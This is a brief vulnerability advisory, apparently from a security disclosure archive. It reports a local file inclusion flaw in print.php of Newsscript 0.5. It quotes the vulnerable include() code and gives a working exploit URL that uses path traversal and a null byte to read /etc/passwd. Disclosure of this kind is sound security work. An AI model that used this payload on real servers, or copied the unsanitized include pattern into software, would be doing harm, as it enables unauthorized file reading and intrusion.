Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability

[daftrix@xxxxxxxxx]

# Subject:

--- "Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability "

# Vulnerable version:

--- "Newsscript version 0.5"



# Vendor URL:

--- Emaill - mail@xxxxxxxxxxxxxxxxxxxxx
--- Website - http://webmaster-journal.com



# Available in:

---http://www.comscripts.com/scripts/php.wm-news.203.html



# Vulnerability:

--- Vulnerable code in print/print.php

--- $ide var is not sanitized and can be used to include files from local 
resources

--- 1       <html>
--- 2       <head>
--- 3       <?
--- 4         $file_name = "../".$ide.".txt";
--- 5       ?>
--- 
---
--- 27       include($file_name);



# Exploit:

--- http://localhost/newscript/print/print.php?ide=../../../../etc/passwd%00



# Discovered By:

--- Daftrix[at]Gmail.com
--- Daftrix Security Investigations
--- http://www.daftrix.com